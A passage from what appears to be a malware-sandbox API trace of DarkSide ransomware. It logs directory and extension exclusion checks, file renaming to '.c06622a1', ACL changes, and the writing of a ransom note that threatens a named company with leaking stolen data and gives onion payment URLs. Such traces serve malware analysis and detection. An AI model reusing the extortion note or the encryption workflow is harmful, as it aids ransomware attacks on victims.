_Str2="avi") returned 7 [0156.485] wcslen (_String="hta") returned 0x3 [0156.485] _wcsicmp (_Str1="msi", _Str2="avi") returned 12 [0156.486] wcslen (_String="msi") returned 0x3 [0156.486] _wcsicmp (_Str1="pdb", _Str2="avi") returned 15 [0156.486] wcslen (_String="pdb") returned 0x3 [0156.486] _wcsicmp (_Str1="sql", _Str2="avi") returned 18 [0156.486] wcslen (_String="sql") returned 0x3 [0156.486] _wcsicmp (_Str1="sqlite", _Str2="avi") returned 18 [0156.486] wcslen (_String="sqlite") returned 0x6 [0156.486] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn")) returned 0x10 [0156.486] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0156.486] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn" [0156.486] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn") returned 0x42 [0156.486] wcscpy (in: _Dest=0x453012e, _Source="cvDNeGwNwfaRnjiro6x.avi" | out: _Dest="cvDNeGwNwfaRnjiro6x.avi") returned="cvDNeGwNwfaRnjiro6x.avi" [0156.486] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\cvDNeGwNwfaRnjiro6x.avi", dwFileAttributes=0x80) returned 1 [0156.486] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\cvDNeGwNwfaRnjiro6x.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\cvdnegwnwfarnjiro6x.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x67c [0156.486] SetFilePointerEx (in: hFile=0x67c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.486] ReadFile (in: hFile=0x67c, lpBuffer=0x3fe674, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe704, lpOverlapped=0x0 | out: lpBuffer=0x3fe674*, lpNumberOfBytesRead=0x3fe704*=0x90, lpOverlapped=0x0) returned 1 [0156.487] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe674, Length=0x80) returned 0xe464ca9f [0156.487] RtlComputeCrc32 (PartialCrc=0xca9f, Buffer=0x3fe674, Length=0x80) returned 0x579d9bd7 [0156.487] RtlComputeCrc32 (PartialCrc=0x9bd7, Buffer=0x3fe674, Length=0x80) returned 0xac512a35 [0156.487] RtlComputeCrc32 (PartialCrc=0x2a35, Buffer=0x3fe674, Length=0x80) returned 0x622b5a97 [0156.487] RtlComputeCrc32 (PartialCrc=0x5a97, Buffer=0x3fe674, Length=0x80) returned 0xa51eb053 [0156.487] CloseHandle (hObject=0x67c) returned 1 [0156.487] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0156.487] wcscpy (in: _Dest=0x45400b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\cvDNeGwNwfaRnjiro6x.avi" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\cvDNeGwNwfaRnjiro6x.avi") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\cvDNeGwNwfaRnjiro6x.avi" [0156.487] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\cvDNeGwNwfaRnjiro6x.avi") returned 0x5a [0156.487] wcscpy (in: _Dest=0x4540164, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.487] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\cvDNeGwNwfaRnjiro6x.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\cvdnegwnwfarnjiro6x.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\cvDNeGwNwfaRnjiro6x.avi.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\cvdnegwnwfarnjiro6x.avi.c06622a1"), dwFlags=0x8) returned 1 [0156.490] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\cvDNeGwNwfaRnjiro6x.avi.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\cvdnegwnwfarnjiro6x.avi.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x67c [0156.490] CreateIoCompletionPort (FileHandle=0x67c, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0156.490] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x2910020 [0156.495] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2c46a5a8 [0156.495] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x100f85c9 [0156.495] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x78c5d997 [0156.495] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x77262cb1 [0156.495] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x754c5d93 [0156.495] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x74608d26 [0156.495] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4e7fccfb [0156.495] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x24a4c204 [0156.499] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2910094, Length=0x80) returned 0xf2f16ac8 [0156.499] RtlComputeCrc32 (PartialCrc=0x6ac8, Buffer=0x2910094, Length=0x80) returned 0x357de09e [0156.499] RtlComputeCrc32 (PartialCrc=0xe09e, Buffer=0x2910094, Length=0x80) returned 0x6e9ba433 [0156.499] RtlComputeCrc32 (PartialCrc=0xa433, Buffer=0x2910094, Length=0x80) returned 0x2d485793 [0156.499] RtlComputeCrc32 (PartialCrc=0x5793, Buffer=0x2910094, Length=0x80) returned 0x47ed030e [0156.499] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2910020) returned 1 [0156.499] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0156.499] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0156.499] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf8440060, ftCreationTime.dwHighDateTime=0x1d5e307, ftLastAccessTime.dwLowDateTime=0x9c56b0a0, ftLastAccessTime.dwHighDateTime=0x1d5e1a8, ftLastWriteTime.dwLowDateTime=0x9c56b0a0, ftLastWriteTime.dwHighDateTime=0x1d5e1a8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="QLTL2-0X", cAlternateFileName="")) returned 1 [0156.499] _wcsicmp (_Str1="$recycle.bin", _Str2="QLTL2-0X") returned -77 [0156.499] wcslen (_String="$recycle.bin") returned 0xc [0156.499] _wcsicmp (_Str1="config.msi", _Str2="QLTL2-0X") returned -14 [0156.499] wcslen (_String="config.msi") returned 0xa [0156.499] _wcsicmp (_Str1="$windows.~bt", _Str2="QLTL2-0X") returned -77 [0156.499] wcslen (_String="$windows.~bt") returned 0xc [0156.499] _wcsicmp (_Str1="$windows.~ws", _Str2="QLTL2-0X") returned -77 [0156.499] wcslen (_String="$windows.~ws") returned 0xc [0156.499] _wcsicmp (_Str1="windows", _Str2="QLTL2-0X") returned 6 [0156.499] wcslen (_String="windows") returned 0x7 [0156.499] _wcsicmp (_Str1="appdata", _Str2="QLTL2-0X") returned -16 [0156.499] wcslen (_String="appdata") returned 0x7 [0156.499] _wcsicmp (_Str1="application data", _Str2="QLTL2-0X") returned -16 [0156.499] wcslen (_String="application data") returned 0x10 [0156.499] _wcsicmp (_Str1="boot", _Str2="QLTL2-0X") returned -15 [0156.499] wcslen (_String="boot") returned 0x4 [0156.499] _wcsicmp (_Str1="google", _Str2="QLTL2-0X") returned -10 [0156.499] wcslen (_String="google") returned 0x6 [0156.499] _wcsicmp (_Str1="mozilla", _Str2="QLTL2-0X") returned -4 [0156.500] wcslen (_String="mozilla") returned 0x7 [0156.500] _wcsicmp (_Str1="program files", _Str2="QLTL2-0X") returned -1 [0156.500] wcslen (_String="program files") returned 0xd [0156.500] _wcsicmp (_Str1="program files (x86)", _Str2="QLTL2-0X") returned -1 [0156.500] wcslen (_String="program files (x86)") returned 0x13 [0156.500] _wcsicmp (_Str1="programdata", _Str2="QLTL2-0X") returned -1 [0156.500] wcslen (_String="programdata") returned 0xb [0156.500] _wcsicmp (_Str1="system volume information", _Str2="QLTL2-0X") returned 2 [0156.500] wcslen (_String="system volume information") returned 0x19 [0156.500] _wcsicmp (_Str1="tor browser", _Str2="QLTL2-0X") returned 3 [0156.500] wcslen (_String="tor browser") returned 0xb [0156.500] _wcsicmp (_Str1="windows.old", _Str2="QLTL2-0X") returned 6 [0156.500] wcslen (_String="windows.old") returned 0xb [0156.500] _wcsicmp (_Str1="intel", _Str2="QLTL2-0X") returned -8 [0156.500] wcslen (_String="intel") returned 0x5 [0156.500] _wcsicmp (_Str1="msocache", _Str2="QLTL2-0X") returned -4 [0156.500] wcslen (_String="msocache") returned 0x8 [0156.500] _wcsicmp (_Str1="perflogs", _Str2="QLTL2-0X") returned -1 [0156.500] wcslen (_String="perflogs") returned 0x8 [0156.500] _wcsicmp (_Str1="x64dbg", _Str2="QLTL2-0X") returned 7 [0156.500] wcslen (_String="x64dbg") returned 0x6 [0156.500] _wcsicmp (_Str1="public", _Str2="QLTL2-0X") returned -1 [0156.500] wcslen (_String="public") returned 0x6 [0156.500] _wcsicmp (_Str1="all users", _Str2="QLTL2-0X") returned -16 [0156.500] wcslen (_String="all users") returned 0x9 [0156.500] _wcsicmp (_Str1="default", _Str2="QLTL2-0X") returned -13 [0156.500] wcslen (_String="default") returned 0x7 [0156.500] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\*" [0156.500] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\*") returned 0x44 [0156.500] wcscpy (in: _Dest=0x451011e, _Source="QLTL2-0X" | out: _Dest="QLTL2-0X") returned="QLTL2-0X" [0156.500] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0156.500] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0156.500] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X" [0156.500] GetNamedSecurityInfoW () returned 0x0 [0156.501] SetEntriesInAclW () returned 0x0 [0156.501] SetNamedSecurityInfoW () returned 0x0 [0156.505] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2e24e30) returned 1 [0156.505] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3fe33c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0156.505] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\qltl2-0x")) returned 1 [0156.505] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0156.505] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\qltl2-0x\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x678 [0156.505] WriteFile (in: hFile=0x678, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fe30c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fe30c*=0xa8f, lpOverlapped=0x0) returned 1 [0156.506] CloseHandle (hObject=0x678) returned 1 [0156.507] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0156.507] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\qltl2-0x")) returned 0x10 [0156.507] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\") returned="" [0156.507] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\") returned 0x4c [0156.507] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\*", fInfoLevelId=0x0, lpFindFileData=0x3fe56c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fe56c) returned 0x2db8800 [0156.507] FindNextFileW (in: hFindFile=0x2db8800, lpFindFileData=0x3fe56c | out: lpFindFileData=0x3fe56c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf8440060, ftCreationTime.dwHighDateTime=0x1d5e307, ftLastAccessTime.dwLowDateTime=0xdbe668e0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xdbe668e0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.507] FindNextFileW (in: hFindFile=0x2db8800, lpFindFileData=0x3fe56c | out: lpFindFileData=0x3fe56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d28bb10, ftCreationTime.dwHighDateTime=0x1d5dcd0, ftLastAccessTime.dwLowDateTime=0xf22dada0, ftLastAccessTime.dwHighDateTime=0x1d5e2dc, ftLastWriteTime.dwLowDateTime=0xf22dada0, ftLastWriteTime.dwHighDateTime=0x1d5e2dc, nFileSizeHigh=0x0, nFileSizeLow=0x17b92, dwReserved0=0x0, dwReserved1=0x0, cFileName="b7bwTMmAmGg_Pf.avi", cAlternateFileName="B7BWTM~1.AVI")) returned 1 [0156.507] _wcsicmp (_Str1="b7bwTMmAmGg_Pf.avi", _Str2="README.c06622a1.TXT") returned -16 [0156.507] wcsstr (_Str="b7bwTMmAmGg_Pf.avi", _SubStr="README") returned 0x0 [0156.507] _wcsicmp (_Str1="autorun.inf", _Str2="b7bwTMmAmGg_Pf.avi") returned -1 [0156.507] wcslen (_String="autorun.inf") returned 0xb [0156.507] _wcsicmp (_Str1="boot.ini", _Str2="b7bwTMmAmGg_Pf.avi") returned 56 [0156.507] wcslen (_String="boot.ini") returned 0x8 [0156.507] _wcsicmp (_Str1="bootfont.bin", _Str2="b7bwTMmAmGg_Pf.avi") returned 56 [0156.507] wcslen (_String="bootfont.bin") returned 0xc [0156.507] _wcsicmp (_Str1="bootsect.bak", _Str2="b7bwTMmAmGg_Pf.avi") returned 56 [0156.507] wcslen (_String="bootsect.bak") returned 0xc [0156.507] _wcsicmp (_Str1="desktop.ini", _Str2="b7bwTMmAmGg_Pf.avi") returned 2 [0156.507] wcslen (_String="desktop.ini") returned 0xb [0156.507] _wcsicmp (_Str1="iconcache.db", _Str2="b7bwTMmAmGg_Pf.avi") returned 7 [0156.507] wcslen (_String="iconcache.db") returned 0xc [0156.508] _wcsicmp (_Str1="ntldr", _Str2="b7bwTMmAmGg_Pf.avi") returned 12 [0156.508] wcslen (_String="ntldr") returned 0x5 [0156.508] _wcsicmp (_Str1="ntuser.dat", _Str2="b7bwTMmAmGg_Pf.avi") returned 12 [0156.508] wcslen (_String="ntuser.dat") returned 0xa [0156.508] _wcsicmp (_Str1="ntuser.dat.log", _Str2="b7bwTMmAmGg_Pf.avi") returned 12 [0156.508] wcslen (_String="ntuser.dat.log") returned 0xe [0156.508] _wcsicmp (_Str1="ntuser.ini", _Str2="b7bwTMmAmGg_Pf.avi") returned 12 [0156.508] wcslen (_String="ntuser.ini") returned 0xa [0156.508] _wcsicmp (_Str1="thumbs.db", _Str2="b7bwTMmAmGg_Pf.avi") returned 18 [0156.508] wcslen (_String="thumbs.db") returned 0x9 [0156.508] _wcsicmp (_Str1="386", _Str2="avi") returned -46 [0156.508] wcslen (_String="386") returned 0x3 [0156.508] _wcsicmp (_Str1="adv", _Str2="avi") returned -18 [0156.508] wcslen (_String="adv") returned 0x3 [0156.508] _wcsicmp (_Str1="ani", _Str2="avi") returned -8 [0156.508] wcslen (_String="ani") returned 0x3 [0156.508] _wcsicmp (_Str1="bat", _Str2="avi") returned 1 [0156.508] wcslen (_String="bat") returned 0x3 [0156.508] _wcsicmp (_Str1="bin", _Str2="avi") returned 1 [0156.508] wcslen (_String="bin") returned 0x3 [0156.508] _wcsicmp (_Str1="cab", _Str2="avi") returned 2 [0156.508] wcslen (_String="cab") returned 0x3 [0156.508] _wcsicmp (_Str1="cmd", _Str2="avi") returned 2 [0156.508] wcslen (_String="cmd") returned 0x3 [0156.508] _wcsicmp (_Str1="com", _Str2="avi") returned 2 [0156.508] wcslen (_String="com") returned 0x3 [0156.508] _wcsicmp (_Str1="cpl", _Str2="avi") returned 2 [0156.508] wcslen (_String="cpl") returned 0x3 [0156.508] _wcsicmp (_Str1="cur", _Str2="avi") returned 2 [0156.508] wcslen (_String="cur") returned 0x3 [0156.508] _wcsicmp (_Str1="deskthemepack", _Str2="avi") returned 3 [0156.508] wcslen (_String="deskthemepack") returned 0xd [0156.508] _wcsicmp (_Str1="diagcab", _Str2="avi") returned 3 [0156.508] wcslen (_String="diagcab") returned 0x7 [0156.508] _wcsicmp (_Str1="diagcfg", _Str2="avi") returned 3 [0156.508] wcslen (_String="diagcfg") returned 0x7 [0156.508] _wcsicmp (_Str1="diagpkg", _Str2="avi") returned 3 [0156.509] wcslen (_String="diagpkg") returned 0x7 [0156.509] _wcsicmp (_Str1="dll", _Str2="avi") returned 3 [0156.509] wcslen (_String="dll") returned 0x3 [0156.509] _wcsicmp (_Str1="drv", _Str2="avi") returned 3 [0156.509] wcslen (_String="drv") returned 0x3 [0156.509] _wcsicmp (_Str1="exe", _Str2="avi") returned 4 [0156.509] wcslen (_String="exe") returned 0x3 [0156.509] _wcsicmp (_Str1="hlp", _Str2="avi") returned 7 [0156.509] wcslen (_String="hlp") returned 0x3 [0156.509] _wcsicmp (_Str1="icl", _Str2="avi") returned 8 [0156.509] wcslen (_String="icl") returned 0x3 [0156.509] _wcsicmp (_Str1="icns", _Str2="avi") returned 8 [0156.509] wcslen (_String="icns") returned 0x4 [0156.509] _wcsicmp (_Str1="ico", _Str2="avi") returned 8 [0156.509] wcslen (_String="ico") returned 0x3 [0156.509] _wcsicmp (_Str1="ics", _Str2="avi") returned 8 [0156.509] wcslen (_String="ics") returned 0x3 [0156.509] _wcsicmp (_Str1="idx", _Str2="avi") returned 8 [0156.509] wcslen (_String="idx") returned 0x3 [0156.509] _wcsicmp (_Str1="ldf", _Str2="avi") returned 11 [0156.509] wcslen (_String="ldf") returned 0x3 [0156.509] _wcsicmp (_Str1="lnk", _Str2="avi") returned 11 [0156.509] wcslen (_String="lnk") returned 0x3 [0156.509] _wcsicmp (_Str1="mod", _Str2="avi") returned 12 [0156.509] wcslen (_String="mod") returned 0x3 [0156.509] _wcsicmp (_Str1="mpa", _Str2="avi") returned 12 [0156.509] wcslen (_String="mpa") returned 0x3 [0156.509] _wcsicmp (_Str1="msc", _Str2="avi") returned 12 [0156.509] wcslen (_String="msc") returned 0x3 [0156.509] _wcsicmp (_Str1="msp", _Str2="avi") returned 12 [0156.509] wcslen (_String="msp") returned 0x3 [0156.509] _wcsicmp (_Str1="msstyles", _Str2="avi") returned 12 [0156.509] wcslen (_String="msstyles") returned 0x8 [0156.509] _wcsicmp (_Str1="msu", _Str2="avi") returned 12 [0156.509] wcslen (_String="msu") returned 0x3 [0156.509] _wcsicmp (_Str1="nls", _Str2="avi") returned 13 [0156.509] wcslen (_String="nls") returned 0x3 [0156.509] _wcsicmp (_Str1="nomedia", _Str2="avi") returned 13 [0156.509] wcslen (_String="nomedia") returned 0x7 [0156.510] _wcsicmp (_Str1="ocx", _Str2="avi") returned 14 [0156.510] wcslen (_String="ocx") returned 0x3 [0156.510] _wcsicmp (_Str1="prf", _Str2="avi") returned 15 [0156.510] wcslen (_String="prf") returned 0x3 [0156.510] _wcsicmp (_Str1="ps1", _Str2="avi") returned 15 [0156.510] wcslen (_String="ps1") returned 0x3 [0156.510] _wcsicmp (_Str1="rom", _Str2="avi") returned 17 [0156.510] wcslen (_String="rom") returned 0x3 [0156.510] _wcsicmp (_Str1="rtp", _Str2="avi") returned 17 [0156.510] wcslen (_String="rtp") returned 0x3 [0156.510] _wcsicmp (_Str1="scr", _Str2="avi") returned 18 [0156.510] wcslen (_String="scr") returned 0x3 [0156.510] _wcsicmp (_Str1="shs", _Str2="avi") returned 18 [0156.510] wcslen (_String="shs") returned 0x3 [0156.510] _wcsicmp (_Str1="spl", _Str2="avi") returned 18 [0156.510] wcslen (_String="spl") returned 0x3 [0156.510] _wcsicmp (_Str1="sys", _Str2="avi") returned 18 [0156.510] wcslen (_String="sys") returned 0x3 [0156.510] _wcsicmp (_Str1="theme", _Str2="avi") returned 19 [0156.510] wcslen (_String="theme") returned 0x5 [0156.510] _wcsicmp (_Str1="themepack", _Str2="avi") returned 19 [0156.510] wcslen (_String="themepack") returned 0x9 [0156.510] _wcsicmp (_Str1="wpx", _Str2="avi") returned 22 [0156.510] wcslen (_String="wpx") returned 0x3 [0156.510] _wcsicmp (_Str1="lock", _Str2="avi") returned 11 [0156.510] wcslen (_String="lock") returned 0x4 [0156.510] _wcsicmp (_Str1="key", _Str2="avi") returned 10 [0156.510] wcslen (_String="key") returned 0x3 [0156.510] _wcsicmp (_Str1="hta", _Str2="avi") returned 7 [0156.510] wcslen (_String="hta") returned 0x3 [0156.510] _wcsicmp (_Str1="msi", _Str2="avi") returned 12 [0156.510] wcslen (_String="msi") returned 0x3 [0156.510] _wcsicmp (_Str1="pdb", _Str2="avi") returned 15 [0156.510] wcslen (_String="pdb") returned 0x3 [0156.510] _wcsicmp (_Str1="sql", _Str2="avi") returned 18 [0156.510] wcslen (_String="sql") returned 0x3 [0156.510] _wcsicmp (_Str1="sqlite", _Str2="avi") returned 18 [0156.510] wcslen (_String="sqlite") returned 0x6 [0156.511] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\qltl2-0x")) returned 0x10 [0156.511] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45600c0 [0156.511] wcscpy (in: _Dest=0x45600c0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS 